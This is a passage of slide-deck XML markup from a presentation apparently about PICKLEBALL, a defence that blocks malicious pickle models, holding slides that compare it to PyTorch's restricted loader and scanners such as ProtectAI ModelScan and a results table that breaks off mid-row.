              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1009" name="Google Shape;1009;p80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4412900" y="2931975"/>
            <a:ext cx="4457400" cy="362700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Dynamic tracing tool proposed by Casey et al. [13].</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1010" name="Google Shape;1010;p80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4412900" y="3498600"/>
            <a:ext cx="4457400" cy="362700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Restricted loader enabled by default in PyTorch.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1011" name="Google Shape;1011;p80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4412900" y="4101050"/>
            <a:ext cx="4457400" cy="362700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Restricted loader with library-specific policies.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1012" name="Google Shape;1012;p80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2394200" y="898725"/>
            <a:ext cx="4736100" cy="362700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>is compared to  State of the Art solutions.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1013" name="Google Shape;1013;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2294625"/>
            <a:ext cx="298880" cy="287347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1014" name="Google Shape;1014;p80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2294637"/>
            <a:ext cx="298800" cy="287400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="43425" lIns="43425" spcFirstLastPara="1" rIns="43425" wrap="square" tIns="43425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="665"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1015" name="Google Shape;1015;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2294631"/>
            <a:ext cx="298880" cy="287347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1016" name="Google Shape;1016;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859896" y="2317214"/>
            <a:ext cx="415605" cy="415605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1017" name="Google Shape;1017;p80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3800862" y="3533187"/>
            <a:ext cx="299700" cy="288000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9075">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="43550" lIns="43550" spcFirstLastPara="1" rIns="43550" wrap="square" tIns="43550">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="666"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1018" name="Google Shape;1018;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3800868" y="3533181"/>
            <a:ext cx="299635" cy="288091"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1019" name="Google Shape;1019;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3692555" y="3448829"/>
            <a:ext cx="516250" cy="456764"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1020" name="Google Shape;1020;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2904225"/>
            <a:ext cx="298880" cy="287347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1021" name="Google Shape;1021;p80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2904237"/>
            <a:ext cx="298800" cy="287400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9050">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="43425" lIns="43425" spcFirstLastPara="1" rIns="43425" wrap="square" tIns="43425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="665"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1022" name="Google Shape;1022;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3801276" y="2904231"/>
            <a:ext cx="298880" cy="287347"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1023" name="Google Shape;1023;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859896" y="2926814"/>
            <a:ext cx="415605" cy="415605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1024" name="Google Shape;1024;p80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3800862" y="4142787"/>
            <a:ext cx="299700" cy="288000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9075">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="43550" lIns="43550" spcFirstLastPara="1" rIns="43550" wrap="square" tIns="43550">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="666"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1025" name="Google Shape;1025;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3800868" y="4142781"/>
            <a:ext cx="299635" cy="288091"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Google Shape;1026;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3692555" y="4058429"/>
            <a:ext cx="516250" cy="456764"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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30" name="Shape 1030"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1031" name="Google Shape;1031;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Evaluation: P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Creates Secure and Usable Policies</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1032" name="Google Shape;1032;p81"/>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1033" name="Google Shape;1033;p81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="316675" y="896800"/>
            <a:ext cx="4496700" cy="514200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>RQ:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> How well does P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>prevent malicious pickle models</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> from executing their payloads? </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1034" name="Google Shape;1034;p81"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="952500" y="1618725"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{11C30A3B-6D4B-4216-B4AD-653BF54A5768}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1441700"/>
                <a:gridCol w="1157000"/>
                <a:gridCol w="1113625"/>
                <a:gridCol w="1194125"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Tool</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Type</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Malicious Blocked</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Correct Block Rate</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>ProtectAI ModelScan</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Scanner</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
